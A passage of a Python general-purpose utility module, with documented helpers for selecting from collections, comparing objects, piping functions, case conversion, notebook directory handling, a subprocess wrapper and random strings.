    >>> d2 = {'a': 10, 'c': -20, 'd': 30}
    >>> d3 = {'c': 10, 'd': 5, 'e': 0}

    # Docstring fix: the example previously called dict_sum(d1, d2) but
    # showed the output of summing all three dicts.
    >>> dict_sum(d1, d2, d3)
    {'a': 11, 'b': 2, 'c': -7, 'd': 35, 'e': 0}
    """
    keys = {key for d in args for key in d.keys()}
    return {key: sum(d.get(key, 0) for d in args)
            for key in keys}
def _select_mapping(items, keep=(), drop=()):
"""Helper function for `select`.
Parameters
----------
items: Mapping
Dict (or similar mapping) to select/drop from.
keep: Iterable[str]
Sequence of keys to keep.
drop: Iterable[str]
Sequence of keys to drop. You should specify either `keep` or `drop`,
not both.
Returns
-------
Dict
"""
if keep:
return {k: items[k] for k in keep}
return {k: v for k, v in items.items() if k not in set(drop)}
def _select_sequence(items, keep=(), drop=()):
"""Helper function for `select` that works on sequences (basically
collections that support enumeration).
Parameters
----------
items: Sequence
List, tuple, or iterable sequence of some sort to select items from.
keep: Iterable[str]
Sequence of indices to keep.
drop: Iterable[str]
Sequence of indices to drop. You should specify either `keep` or
`drop`, not both.
Returns
-------
Same type as `items` (usually a list or tuple).
"""
type_ = type(items)
if keep:
return type_(x for i, x in enumerate(items) if i in set(keep))
return type_(x for i, x in enumerate(items) if i not in set(drop))
def select(items, keep=(), drop=()):
    """Subset a data structure: for mappings (e.g. dict) specify keys to
    include or exclude; for sequences (list, tuple) specify indices.

    Parameters
    ----------
    items: abc.Sequence or abc.Mapping
        Collection to subset.
    keep: Iterable
        Keys/indices to retain. Specify exactly one of `keep` or `drop`.
    drop: Iterable
        Keys/indices to discard.

    Returns
    -------
    dict (for mappings) or the input's own type (for sequences), containing
    only the specified entries (with `keep`) or everything except them
    (with `drop`).
    """
    if bool(keep) + bool(drop) != 1:
        raise InvalidArgumentError('Specify exactly one of `keep` or `drop`.')
    if isinstance(items, Mapping):
        return _select_mapping(items, keep, drop)
    if isinstance(items, Sequence):
        return _select_sequence(items, keep, drop)
    raise InvalidArgumentError('`items` must be a Mapping or Sequence.')
def differences(obj1, obj2, methods=False, **kwargs):
    """Find the differences between two objects (generally of the same type -
    technically this isn't enforced but we do require that the objects have
    the same set of attribute names so a similar effect is achieved. Actual
    type checking was causing problems comparing multiple Args instances,
    presumably because each Args object is defined when called).

    This is a way to get more detail beyond whether two objects are equal or
    not.

    Parameters
    -----------
    obj1: any
        An object.
    obj2: any, usually the same type as obj1
        An object.
    methods: bool
        If True, include methods in the comparison. If False, only attributes
        will be compared. Note that the output may not be particularly
        interpretable when using method=True; for instance when comparing two
        strings consisting of different characters, we get a lot of output
        that looks like this:

        {'islower': (<function str.islower()>, <function str.islower()>),
        'isupper': (<function str.isupper()>, <function str.isupper()>),...
        'istitle': (<function str.istitle()>, <function str.istitle()>)}

        These attributes all reflect the same difference: if obj1 is 'abc'
        and obj2 is 'def', then
        'abc' != 'def' and
        'ABC' != 'DEF' and
        'Abc' != 'Def'.

        When method=False, we ignore all of these, such that
        differences('a', 'b') returns {}. Therefore, it is important to
        carefully consider what differences you care about identifying.
    **kwargs: bool
        Can pass args to hdir to include magics or internals.

    Returns
    --------
    dict[str, tuple]: Maps attribute name to a tuple of values, where the
        first is the corresponding value for obj1 and the second is the
        corresponding value for obj2.
    """
    # Many objects define built-in equality; if they compare equal we can
    # short-circuit. Keep error handling broad since __eq__ may raise for
    # arbitrary types.
    try:
        if obj1 == obj2:
            return {}
    except Exception:
        pass
    attr1, attr2 = hdir(obj1, **kwargs), hdir(obj2, **kwargs)
    assert attr1.keys() == attr2.keys(), 'Objects must have same attributes.'
    diffs = {}
    for (k1, v1), (k2, v2) in zip(attr1.items(), attr2.items()):
        # Only compare non-callable attributes.
        if not (methods or v1 == 'attribute'):
            continue
        # Comparisons work differently for arrays/tensors than other objects:
        # elementwise == returns an array, so collapse it with .all().
        val1, val2 = getattr(obj1, k1), getattr(obj2, k2)
        try:
            equal = (val1 == val2).all()
        except AttributeError:
            equal = val1 == val2
        # Store values that are different for obj1 and obj2.
        if not equal:
            diffs[k1] = (val1, val2)
    return diffs
def catch(func, *args, verbose=False):
    """Error handling for list comprehensions: returns None instead of
    raising. In practice, it's recommended to use the higher-level
    robust_comp() function which uses catch() under the hood.

    Parameters
    -----------
    func: function
    *args: any type
        Arguments passed on to func.
    verbose: bool
        If True, print the error message should one occur.

    Returns
    --------
    any type: func's output if it executes successfully, otherwise None.

    Examples
    ---------
    [catch(lambda x: 1 / x, i) for i in range(3)]
    >>> [None, 1.0, 0.5]

    # Note that the filtering method shown below also removes zeros which is
    # okay in this case.
    list(filter(None, [catch(lambda x: 1 / x, i) for i in range(3)]))
    >>> [1.0, 0.5]
    """
    try:
        return func(*args)
    except Exception as e:
        if verbose:
            print(e)
        return None
def safe_map(func, seq):
    """Map `func` over `seq`, silently skipping any items that raise.
    Values of None are also removed from the resulting list.

    Parameters
    ----------
    func: function
        Applied to each item in seq.
    seq: generator, iterator
        The sequence to iterate over. This could also be a generator, list,
        set, etc.

    Returns
    -------
    list

    Examples
    --------
    # Instead of raising on division by zero, that entry is simply dropped.
    >>> safe_map(lambda x: x/(x-2), range(4))
    [-0.0, -1.0, 3.0]
    """
    results = []
    for obj in seq:
        try:
            out = func(obj)
        except Exception:
            # Failed items are skipped entirely.
            continue
        if out is not None:
            results.append(out)
    return results
def flatten(nested):
    """Fully un-nest a sequence whose sub-items may be primitives,
    sequences, or nested combinations of both. Strings are treated as
    primitives; every other iterable is expanded, so use with caution
    (e.g. a torch Dataset would be unpacked into separate items for each
    index). Returns a list rather than a generator.

    Parameters
    ----------
    nested: sequence (list, tuple, set)
        Sequence where some or all of the items are also sequences.

    Returns
    -------
    list: Flattened version of `nested`.
    """
    flat = []
    for item in nested:
        if isinstance(item, Iterable) and not isinstance(item, str):
            # Recurse into nested iterables.
            flat.extend(flatten(item))
        else:
            flat.append(item)
    return flat
class BasicPipeline:
    """Simple unidirectional pipeline: apply a sequence of functions in
    order, with optional debugging output after each step.
    """

    def __init__(self, *funcs):
        """
        Parameters
        ----------
        *funcs: function(s)
            One or more functions to apply in the specified order.
        """
        # Store as a list so callers can mutate the pipeline afterwards.
        self.funcs = list(funcs)

    def __call__(self, x, verbose=False, attr=''):
        """Run x through the pipeline of functions.

        Parameters
        ----------
        x: any
            Object to operate on.
        verbose: bool
            If True, print x (or an attribute of x) after each step.
        attr: str
            If specified and verbose is True, print this attribute of x
            after each function is applied.

        Returns
        -------
        output of last func in self.funcs
        """
        for step in self.funcs:
            x = step(x)
            if verbose:
                print(repr(getattr(x, attr, x)))
        return x

    def __repr__(self):
        # Display each item roughly as it was passed in: callables show
        # their str form, otherwise fall back to the function name.
        names = ',\n\t'.join(str(f) if hasattr(f, '__call__') else func_name(f)
                             for f in self.funcs)
        return f'{type(self).__name__}(\n\t{names}\n)'
def pipe(x, *funcs, verbose=False, attr=''):
    """Apply a sequence of functions to an object in order. A readable
    alternative to deeply nested calls that are hard to parenthesize:

        list(parse_processed_text(tokenize_rows(porter_stem(
            strip_html_tags(text)))))

    becomes:

        pipe(text, strip_html_tags, porter_stem, tokenize_rows,
             parse_processed_text, list)

    or, with a list of functions, pipe(x, *funcs).

    Parameters
    ----------
    x: any
        Object to apply functions to.
    *funcs: function(s)
        Functions in the order you want to apply them. Use functools.partial
        to specify other arguments.
    verbose: bool
        If True, print x (or an attribute of x) after each step.
    attr: str
        If specified and verbose is True, print this attribute of x after
        each function is applied.

    Returns
    -------
    output of last func in *funcs
    """
    for fn in funcs:
        x = fn(x)
        if verbose:
            print(repr(getattr(x, attr, x)))
    return x
def vcounts(arr, normalize=True):
    """Value counts for lists/arrays, equivalent to the pandas_htools
    vcounts method. A thin wrapper around collections.Counter with optional
    normalization.

    Parameters
    ----------
    arr: Iterable
        Values to count. Typically a list or numpy array.
    normalize: bool
        If True, return fractions instead of raw counts.

    Returns
    -------
    dict: Maps each unique item in `arr` to the number of times (or % of
        times) it occurs in `arr`.
    """
    raw = Counter(arr)
    if not normalize:
        return dict(raw)
    total = len(arr)
    return {key: count / total for key, count in raw.items()}
def item(it, random=True, try_values=True):
    """Grab a single element from an iterable that may not support indexing
    (e.g. dict, set, torch DataLoader), or that does but would require
    knowing a key.

    Parameters
    ----------
    it: Iterable
        Container to pull a value from.
    random: bool
        If True, pick a random element; otherwise return the first one.
    try_values: bool
        If True and `it` has a `values` attribute (e.g. a dict), operate on
        its values instead - we usually want a dict's value, not its key.
        For key-value pairs, pass d.items() with try_values=False.

    Returns
    -------
    any: An item from the iterable.
    """
    target = it.values() if (try_values and hasattr(it, 'values')) else it
    if not random:
        return next(iter(target))
    return choice(list(target))
def lmap(fn, *args):
    """Apply a function to each positional argument and return the results
    as a list: `lmap(fn, x, y)` is equivalent to `[fn(obj) for obj in
    (x, y)]` or `list(map(fn, (x, y)))`. The star-args interface saves a
    little typing during fast prototyping - no temporary tuple needed.

    Parameters
    ----------
    fn: callable
        Function applied to each argument.
    args: any
        Objects to transform.

    Returns
    -------
    list: `fn` applied to each of `args`, in order.
    """
    return [fn(arg) for arg in args]
def amap(attr, *args):
    """'Attrmap': fetch the same attribute from multiple objects. Intended
    for quick data exploration, e.g. comparing shapes of several dataframes
    or parameter tensors.

    Parameters
    ----------
    attr: str
        Name of the attribute to retrieve for each object.
    args: any
        Objects (usually of the same type) to inspect.

    Returns
    -------
    list: The attribute value for each object, in order.

    Examples
    --------
    >>> amap('shape', df1, df2, df3)
    [(4, 5), (4, 5), (2, 3)]

    >>> amap('shape', *net.parameters())
    [torch.Size([5, 3]), torch.Size([16, 4])]
    """
    fetch = lambda obj: getattr(obj, attr)
    return list(map(fetch, args))
def smap(*x):
    """Shape-map: return the shape of each array/tensor passed in.

    Parameters
    ----------
    *x: np.arrays or torch.tensors
        Star unpacking keeps the interface consistent with amap() and
        lmap().

    Returns
    -------
    list: Shape of each input, in order.
    """
    return [obj.shape for obj in x]
def sleepy_range(*args, wait=1, wait_before=True):
    """range() with a sleep baked into every iteration - handy for mimicking
    time-intensive work, particularly in list comprehensions where inserting
    a sleep is otherwise awkward. Unlike range, the result is a single-use
    generator: once consumed it must be recreated.

    Parameters
    ----------
    args: int
        Forwarded to range() (start/stop/step).
    wait: int or float
        Seconds to sleep per iteration. Keyword-only so the positional
        interface stays compatible with range.
    wait_before: bool
        If True (default), sleep before yielding each number - mimicking
        "doing work" before producing a result. Otherwise sleep after.

    Examples
    --------
    # Takes 6 seconds to build this list.
    >>> [i for i in sleepy_range(3, wait=2)]
    [0, 1, 2]
    """
    for n in range(*args):
        if wait_before:
            time.sleep(wait)
            yield n
        else:
            yield n
            time.sleep(wait)
def venumerate(iterable, start=0, freq=1, print_before=True,
               message_format='{}'):
    """Verbose enumerate: a drop-in replacement that prints a progress
    message every `freq` iterations. Useful when a tqdm bar isn't available
    (unknown iterable length, some concurrency setups) and especially inside
    list comprehensions, where adding print logic is otherwise clumsy.

    Parameters
    ----------
    iterable: Iterable
        Object to iterate over.
    start: int
        First index, as in enumerate.
    freq: int
        Print whenever the index is divisible by this.
    print_before: bool
        If True, print before yielding the i'th value; otherwise after.
    message_format: str
        Format string applied to the index for each update. Defaults to
        printing the bare index.

    Yields
    ------
    tuple[int, any]: Same (index, value) pairs as enumerate.
    """
    for idx, val in enumerate(iterable, start=start):
        due = idx % freq == 0
        if due and print_before:
            print(message_format.format(idx))
        yield idx, val
        if due and not print_before:
            print(message_format.format(idx))
def method_of(meth):
    """Look up the class a method belongs to. This does NOT work on plain
    attributes, and it returns the defining class rather than any instance.
    The result is the same whether the method was accessed via an instance
    or via its class.

    Parameters
    ----------
    meth: MethodType
        The method whose defining class we want.

    Returns
    -------
    type: The class which defines the method in question.

    Examples
    --------
    class Foo:
        def my_method(self, x):
            return x*2

    f = Foo()
    assert method_of(Foo.my_method) == method_of(f.my_method) == Foo
    """
    # Qualname looks like 'ClassName.method_name'; resolve the class by name
    # among the members of the method's defining module.
    cls_name, _ = meth.__qualname__.split('.')
    module_members = dict(getmembers(getmodule(meth)))
    return module_members[cls_name]
def hasstatic(cls, meth_name):
    """hasattr-style check: does a class define a staticmethod with the
    given name? We must inspect the raw descriptor via getattr_static (or
    cls.__dict__) - isinstance(cls.meth_name, staticmethod) is always False
    because normal attribute access unwraps the descriptor.

    Parameters
    ----------
    cls: Type or any
        A class or an instance (appears to work on both).
    meth_name: str
        Method name to look for. A missing attribute simply yields False.

    Returns
    -------
    bool: True if `cls` has a staticmethod named `meth_name`.
    """
    descriptor = getattr_static(cls, meth_name, None)
    return isinstance(descriptor, staticmethod)
def isstatic(meth):
    """Companion to hasstatic: decide whether a given callable is a
    staticmethod, starting from the object itself rather than a
    (class, name) pair. Delegates to hasstatic internally.
    """
    # Cheap rejections first: bound methods and non-callables can't be
    # staticmethods, and checking them avoids the hackier qualname parsing.
    if ismethod(meth) or not callable(meth):
        return False
    qualparts = getattr(meth, '__qualname__', '').split('.')
    # A staticmethod defined directly on a class has a two-part qualname.
    if len(qualparts) != 2:
        return False
    return hasstatic(method_of(meth), qualparts[-1])
def has_classmethod(cls, meth_name):
    """Check if a class has a classmethod with a given name. As with
    hasstatic, we must use getattr_static (or cls.__dict__) to see the raw
    classmethod descriptor: isinstance(cls.meth_name, classmethod) would
    always return False because attribute access unwraps it.

    Parameters
    ----------
    cls: type or obj
        This is generally intended to be a class but it should work on
        objects (class instances) as well.
    meth_name: str
        The name of the potential classmethod to check for.

    Returns
    -------
    bool: True if cls possesses a classmethod with the specified name.
        Consistent with hasstatic, a missing attribute returns False
        (previously this raised AttributeError because no default was
        passed to getattr_static).
    """
    return isinstance(getattr_static(cls, meth_name, None), classmethod)
def is_classmethod(meth):
    """Companion to has_classmethod: decide whether a given method object is
    a classmethod, rather than supplying a class and a name. Delegates to
    has_classmethod internally.
    """
    # Classmethods accessed on a class arrive bound (to the class), so
    # anything that isn't a bound method is rejected immediately.
    if not ismethod(meth):
        return False
    qualparts = getattr(meth, '__qualname__', '').split('.')
    if len(qualparts) != 2:
        return False
    return has_classmethod(method_of(meth), qualparts[-1])
def parallelize(func, items, total=None, chunksize=1_000, processes=None):
    """Map a function over a sequence using a process pool, with a tqdm
    progress bar.

    Parameters
    ----------
    func: function
        Applied to each element of `items`.
    items: Iterable
        Inputs to process. May be a generator as long as `total` is given.
    total: int or None
        Length of `items`; defaults to len(items). Passing it explicitly
        lets tqdm pace the bar when `items` has no len (e.g. a generator).
    chunksize: int
        Number of items submitted to the pool per task. Multiprocessing's
        default is 1; larger chunks are usually faster for long sequences.
    processes: None
        Optionally set the number of worker processes (None lets
        multiprocessing pick).

    Returns
    -------
    list: func applied to each item, in order.
    """
    total = total or len(items)
    with Pool(processes) as pool:
        mapped = pool.imap(func, items, chunksize=chunksize)
        return list(tqdm(mapped, total=total))
def identity(x):
    """Return the input argument unchanged. Useful as a default callable:
    rather than storing None and checking for it before every call, store
    identity and call it unconditionally.

    Parameters
    ----------
    x: any

    Returns
    -------
    any: The input, untouched.
    """
    return x
def always_true(x, *args, **kwargs):
    """Counterpart to `identity` that ignores all inputs and returns True.
    (Deliberately not named `true`: that would invite horrible bugs through
    confusion with the builtin True.)
    """
    return True
def ifnone(arg, backup):
    """Return `arg` unless it is None, in which case return `backup`.
    Particularly handy with numpy arrays, whose truthiness is ambiguous
    (so `arg or backup` would not work).

    Parameters
    ----------
    arg: any
        Value tested against None.
    backup: any
        Fallback returned when `arg` is None.

    Returns
    -------
    Either `arg` or `backup`.
    """
    if arg is None:
        return backup
    return arg
def listlike(x):
    """True for list/tuple/set/array-style iterables. Strings and mappings
    (e.g. dicts) are iterable too but deliberately excluded.
    """
    if isinstance(x, (str, Mapping)):
        return False
    return isinstance(x, Iterable)
def tolist(x, length_like=None, length=None,
           error_message='x length does not match desired length.'):
    """Normalize an argument that may be either a single value or a sequence
    into a list, letting a function accept both forms for one parameter.

    WARNING: if x is a primitive and a length is requested (via
    `length_like` or `length`), the result repeats references to the SAME
    object. That's fine for the intended floats/ints; be careful if you use
    this with mutable objects.

    Parameters
    ----------
    x: Iterable
        Usually either a list/tuple or a primitive.
    length_like: None or object
        If provided, x must match len(length_like); a primitive x is
        repeated to that length. Overrides `length` (only provide one).
    length: None or int
        Desired length, given directly.
    error_message: str
        Shown when x is list-like but doesn't match the requested length.
        Pass your own message for something more use-case specific.

    Returns
    -------
    list

    Examples
    --------
    def train(lrs):
        lrs = tolist(lrs)
        ...

    We can now pass in a single learning rate or multiple.
    >>> train(3e-3)
    >>> train([3e-4, 3e-3])
    """
    if length_like is not None:
        length = len(length_like)
    # Sequences pass straight through (after an optional length check).
    if listlike(x):
        if length:
            assert len(x) == length, error_message
        return list(x)
    # Mappings are ambiguous (keys? values? items?), so reject them.
    if isinstance(x, Mapping):
        raise ValueError('x must not be a mapping. It should probably be a '
                         'primitive (str, int, etc.) or a list-like object '
                         '(tuple, list, set).')
    # Primitives are repeated to the requested length (default 1).
    return [x] * (length or 1)
def xor_none(*args, n=1):
    """Validate that exactly `n` of the inputs are not None. Most often used
    with n=1 to enforce mutually exclusive optional arguments (e.g. the user
    must pass a directory name XOR a list of files, not both).

    Parameters
    ----------
    args: any
    n: int
        Required count of non-None elements. Usually 1, but other values
        are allowed.

    Returns
    -------
    None: Raises ValueError when the condition fails and otherwise returns
    nothing - so never use the result as an if condition (it's always None,
    i.e. falsy).
    """
    non_none = sum(1 for arg in args if arg is not None)
    if non_none != n:
        raise ValueError(f'Exactly {n} of args must be not None.')
def max_key(d, fn=identity):
    """Return the key of a dict whose value is largest. Values may be
    compared through an arbitrary function: e.g. for string values, fn=len
    picks the key with the longest value.

    Parameters
    ----------
    d: dict
        Candidates to select from.
    fn: callable
        Maps one dict value to a number used for comparison. Defaults to
        the value itself.

    Returns
    -------
    A key from dict `d`.
    """
    best_key, _ = max(d.items(), key=lambda kv: fn(kv[1]))
    return best_key
def is_builtin(x, drop_callables=True):
    """Check whether an object - and, for containers, everything inside it -
    is a Python built-in.

    Parameters
    ----------
    x: object
    drop_callables: bool
        If True, callables (functions, methods, classes) count as NOT
        built-in even though their classes (`type`,
        `builtin_function_or_method`) would otherwise pass the check.

    Returns
    -------
    bool: True if `x` is a built-in object, False otherwise.
    """
    def check(obj):
        # Optionally rule out callables, then ask whether the object's class
        # lives in the builtins module.
        if drop_callables and callable(obj):
            return False
        return obj.__class__.__module__ == 'builtins'

    # Mappings must come first since they are also Iterable. For containers,
    # the container itself AND all flattened contents must pass.
    if isinstance(x, Mapping):
        return check(x) and all(check(o) for o in flatten(x.items()))
    if isinstance(x, Iterable):
        return check(x) and all(check(o) for o in flatten(x))
    return check(x)
def hashable(x):
    """Report whether an object can be hashed. Hashable usually implies
    immutable, though that is not guaranteed.

    Parameters
    ----------
    x: object
        The item to check for hashability.

    Returns
    -------
    bool: True if hashing succeeds, False if it raises TypeError.
    """
    try:
        hash(x)
    except TypeError:
        return False
    return True
def fgrep(text, term, window=25, with_idx=False, reverse=False):
    """Search a string for a given term. If found, return it with some
    surrounding context, similar to `grep -C 1 term text`. `fgrep` is short
    for faux grep.

    Parameters
    ----------
    text: str
        Text to search.
    term: str
        Term to look for in text.
    window: int
        Number of characters of context to include before and after the
        matching term.
    with_idx: bool
        If True, return the match index as well as the string.
    reverse: bool
        If True, reverse search direction (find last match, not first).

    Returns
    -------
    str or tuple[int, str]: The desired term and its surrounding context.
        If the term isn't present, an empty string is returned. If
        with_idx=True, a tuple of (match index, string with text) is
        returned (index is -1 when there's no match).
    """
    idx = text.rfind(term) if reverse else text.find(term)
    if idx == -1:
        res = ''
    else:
        # Bug fix: the window previously ended at idx+window, i.e. it was
        # measured from the START of the match, so the term itself got cut
        # off whenever len(term) approached `window`. Extend the slice past
        # the full term so `window` chars of context follow it, as the
        # docstring promises.
        res = text[max(idx - window, 0):idx + len(term) + window]
    return (idx, res) if with_idx else res
def spacer(char='-', n_chars=79, newlines_before=1, newlines_after=1):
    """Build a separator string (e.g. a dashed line) for visually dividing
    printed output across multiple items.

    Parameters
    ----------
    char: str
        The character to repeat. Expected to be a single character, so
        `n_chars` ends up being the total line length.
    n_chars: int
        How many times to repeat `char`.
    newlines_before: int
        Number of newline characters prepended to the line.
    newlines_after: int
        Number of newline characters appended to the line.

    Returns
    -------
    str
    """
    pieces = ['\n' * newlines_before, char * n_chars, '\n' * newlines_after]
    return ''.join(pieces)
def hr(char='-', n_chars=79, newlines_before=1, newlines_after=1):
    """Horizontal rule: print a separator line, usually to visually divide
    outputs inside a loop. Equivalent to print(spacer(...)); spacer() is
    kept around for old callers, while this is the quicker spelling.
    """
    line = spacer(char, n_chars, newlines_before=newlines_before,
                  newlines_after=newlines_after)
    print(line)
def func_name(func):
    """Return a callable's name. Unlike accessing __name__ directly, this
    also handles functools.partial (which hides the wrapped function's
    __name__) and callable class instances (falls back to the class name).

    Parameters
    ----------
    func: callable
        Can be a function, partial, or callable object.

    Returns
    -------
    str: Best-effort name for the callable.
    """
    # Note: a redundant `except Exception as e: raise e` clause was removed
    # here - re-raising the same exception unchanged is a no-op.
    assert callable(func), 'Input must be callable.'
    try:
        return func.__name__
    except AttributeError:
        # Partials lack __name__; recurse into the wrapped function.
        if isinstance(func, partial):
            return func_name(func.func)
        # Callable instance: report its class name.
        return func.__class__.__name__
def snake2camel(text):
    """Convert snake case to camel case. The input is assumed to already be
    valid snake case; hybrids of snake and camel case need preprocessing
    first.

    Parameters
    ----------
    text: str
        Snake case string, e.g. vader_sentiment_score.

    Returns
    -------
    str: `text` converted to camel case, e.g. vaderSentimentScore.
    """
    out = []
    previous = ''
    for ch in text:
        if ch != '_':
            # Capitalize only after an underscore - and never at the very
            # start (out still empty), so leading underscores don't
            # uppercase the first letter.
            out.append(ch.upper() if previous == '_' and out else ch)
        previous = ch
    return ''.join(out)
def camel2snake(text):
    """Convert camel case to snake case. The input is assumed to already be
    valid camel case; hybrids of camel and snake case need preprocessing
    first.

    Parameters
    ----------
    text: str
        Camel case string, e.g. vaderSentimentScore.

    Returns
    -------
    str: `text` converted to snake case, e.g. vader_sentiment_score.
    """
    # Non-lowercase characters mark word boundaries: emit '_' + lowercase.
    return ''.join(ch if ch.islower() else '_' + ch.lower() for ch in text)
def to_snake(text):
    """Experimental feature: tries to convert any common format to snake
    case. Not extensively tested, but it appears to handle snake case (no
    change), camel case, upper camel case, hyphen/dash/space separated
    words, and combinations of the above. It may occasionally split words
    that should not be split, though this should be rare with real English
    words. Less suitable for heavily abbreviated fastai-style names (e.g.
    "tfms" for "transforms"); the intended use case is mostly fixing column
    names in pandas.

    Parameters
    ----------
    text: str

    Returns
    -------
    str: Input text converted to snake case.
    """
    # `wn` is presumably a module-level compiled word-splitting regex
    # defined elsewhere in this module - TODO confirm its pattern before
    # relying on edge cases. Note the text is lowercased BEFORE splitting,
    # so the split cannot be driven by case changes at this point.
    return '_'.join(wn.split(text.lower()))
def to_camel(text):
    """Experimental feature: tries to convert any common format to camel
    case. Not extensively tested, but it appears to handle camel case (no
    change), snake case, upper camel case, hyphen/dash/space separated
    words, and combinations of the above. It may occasionally split words
    that should not be split, though this should be rare with real English
    words. Less suitable for heavily abbreviated fastai-style names (e.g.
    "tfms" for "transforms"); the intended use case is mostly fixing column
    names in pandas.

    Parameters
    ----------
    text: str

    Returns
    -------
    str: Input text converted to camel case. (The original docstring said
    "snake case" here - a copy/paste typo.)
    """
    # `wn` is presumably a module-level compiled word-splitting regex
    # defined elsewhere in this module - TODO confirm. The first token keeps
    # its lowercased form; every later token is title-cased.
    return ''.join(w.title() if i > 0 else w
                   for i, w in enumerate(wn.split(text.lower())))
def kwargs_fallback(self, *args, assign=False, **kwargs):
    """Resolve values that may come either from **kwargs or from instance
    attributes. Use inside a method accepting **kwargs when you normally
    compute with an instance variable but want callers to be able to pass a
    one-off override (common with ML hyperparameters).

    Parameters
    ----------
    self: object
        The instance whose attributes serve as fallbacks. Callers usually
        literally pass `self`.
    args: str
        One or more names of variables to resolve.
    assign: bool
        If True, kwarg-provided values are also written back onto the
        instance; if False (the default), the instance state is untouched.
    kwargs: any
        Just forward along the kwargs passed to the method.

    Returns
    -------
    list or single object: One resolved value per name in `args`; when only
    one name is requested, the bare value (not a list) is returned.

    Examples
    --------
    class Foo:
        def __init__(self, a, b=3, c=('a', 'b', 'c')):
            self.a, self.b, self.c = a, b, c

        def walk(self, d, **kwargs):
            # Doesn't change attributes of self...
            a, c = kwargs_fallback(self, 'a', 'c', **kwargs)
            # ...while assign=True updates self.b and self.c from kwargs.
            b, c = kwargs_fallback(self, 'b', 'c', assign=True, **kwargs)
    """
    resolved = []
    for name in args:
        # Membership test rather than `kwargs.get(name) or ...` so that
        # falsy overrides (None, 0, empty numpy arrays) are still honored.
        if name in kwargs:
            value = kwargs[name]
        else:
            value = getattr(self, name)
        if assign:
            setattr(self, name, value)
        resolved.append(value)
    return resolved if len(resolved) > 1 else resolved[0]
def cd_root(root_subdir='notebooks', max_depth=4):
    """Run at the start of a Jupyter notebook to move the working directory
    to the project root: keep hopping to the parent directory until the cwd
    contains `root_subdir`.

    Parameters
    ----------
    root_subdir: str
        Name of a subdirectory that identifies the project root. Choose
        carefully if the name occurs at multiple levels of your tree (e.g.
        with ~/htools/lib/htools, 'htools' would be a bad choice if you
        want to end up in ~).
    max_depth: int
        Maximum number of parent hops before giving up - guards against an
        infinite climb when root_subdir is misspelled or absent.

    Examples
    --------
    Sample file structure (abbreviated):
    my_project/
        py/
            fetch_raw_data.py
        notebooks/
            nb01_eda.ipynb

    Running cd_root() from nb01_eda.ipynb changes the working directory
    from notebooks/ to my_project/, which is typically where scripts in
    py/ are run from - making notebook-to-script conversion easier.
    """
    origin = os.getcwd()
    hops = 0
    # next(os.walk('.'))[1] lists the immediate subdirectories of the cwd.
    while root_subdir not in next(os.walk('.'))[1]:
        if hops >= max_depth:
            # Restore the starting directory before bailing out.
            os.chdir(origin)
            raise RuntimeError('Exceeded max_depth. Check that your '
                               'root_subdir is <= max_depth directories '
                               'away.')
        os.chdir('..')
        hops += 1
    print('Current directory:', os.getcwd())
def ngrams(word, n=3, step=1, drop_last=False):
    """Slide a window of size `n` over a string (or other sliceable
    sequence), advancing `step` positions each time. Pass step=n to get
    non-overlapping chunks. The final ngram may be shorter than `n` when
    the input doesn't divide evenly; set drop_last=True to discard it in
    that case.
    """
    # The max() ensures at least one (possibly short) ngram is produced,
    # even when the input is shorter than n.
    last_start = max(1, step + len(word) - n)
    grams = [word[start:start + n] for start in range(0, last_start, step)]
    if drop_last and len(grams[-1]) < n:
        grams.pop()
    return grams
def shell(cmd, return_output=True):
    """Execute a shell command via subprocess. (Between subprocess and os
    there are ~5 ways to do this; this module picks once so we never have to
    decide again.) Note this blocks until the command completes - reach for
    subprocess.check_call directly if you want to launch a process and keep
    going without waiting.

    Parameters
    ----------
    cmd: str
        Example: 'ls *.csv'. The string is split on whitespace, so quoted
        arguments containing spaces will NOT survive intact.
    return_output: bool
        If True, return the command's stdout as a decoded string (e.g.
        'pip show requests' returns the text describing your installed
        requests version). If False, return (returncode, stderr, stdout) -
        though the latter two are often None since output isn't captured.

    Returns
    -------
    str when return_output=True; otherwise a tuple of returncode (int),
    stderr, and stdout (each str or None).
    """
    argv = cmd.split()
    if not return_output:
        proc = run(argv)
        return proc.returncode, proc.stderr, proc.stdout
    return check_output(argv).decode()
def set_summary(x1, x2, info=('first_only', 'second_only')):
    """Print and return a set-style comparison of two iterables (converted
    to sets internally). Counts for all four relationships are printed;
    only the ones named in `info` are returned.

    Parameters
    ----------
    x1, x2: Iterable
        Sequences to compare.
    info: Iterable[str]
        Which pieces to return: 'first_only' (items only in x1),
        'second_only' (items only in x2), 'and' (in both), 'or' (in
        either).

    Returns
    -------
    dict[str, set]: Maps each str in `info` to its set of items.
    """
    first, second = set(x1), set(x2)
    summary = {
        'and': first & second,
        'or': first | second,
        'first_only': first - second,
        'second_only': second - first,
    }
    for name, members in summary.items():
        print(f'{name}: {len(members)} items')
    return select(summary, keep=list(info))
def random_str(length, lower=False, valid=tuple(ascii_letters + '0123456789')):
    """Generate a random string of alphanumeric characters (sampled with
    replacement).

    Parameters
    ----------
    length: int
        Number of characters in the output string.
    lower: bool
        If True, lowercase the result.
    valid: Iterable
        Pool of valid characters (strings) to sample from.

    Returns
    -------
    str: `length` characters long.
    """
    result = ''.join(choices(valid, k=length))
    if lower:
        result = result.lower()
    return result
def is_ipy_name(
    name,
    count_as_true=('In', 'Out', '_dh', '_ih', '_ii', '_iii', '_oh')
):
    """Detect variable names that look like ipython bookkeeping/output-cell
    names, e.g. "_49", "_", or "__".

    Returns True for names like
    ['_', '__', '_i3', '__i3', '_4', '_9913', '__7', '__23874']
    (a few of these may not actually occur in ipython, but they clearly
    aren't user variables either) and False for names like
    ['_a', 'i22', '__0i', '_03z', '__99t']
    and most "normal" variable names.

    Parameters
    ----------
    name: str
    count_as_true: Iterable[str]
        Additional names that don't fit the underscore pattern but should
        still return True (ipython's In/Out/_dh/etc.).

    Returns
    -------
    bool: True if it looks like an ipython-generated name, False otherwise.
    """
    if name in count_as_true:
        return True
    # Names made solely of underscores count, regardless of how many.
    if not name.strip('_'):
        return True
    # Otherwise: 1-2 leading underscores, optional 'i', optional digits
    # ("_4", "_i3", "__23874").
    return bool(re.match(r'^_{1,2}i?\d*$', name))
def varname(x, *skip, skip_ipy_names=True, strict=True):
    """Best-effort reverse lookup: guess the global variable name(s) bound
    to an object by matching id() against this module's globals().

    Parameters
    ----------
    x: any
        Object we'd like to programmatically get the name of.
    skip: str
        Names to exclude from the candidates - see Examples for a common
        reason.
    skip_ipy_names: bool
        Ignore ipython bookkeeping names such as "_49", "_", "___".
    strict: bool
        Multiple candidates can occur (e.g. two variables holding equal
        small ints share an id). strict=True raises in that case;
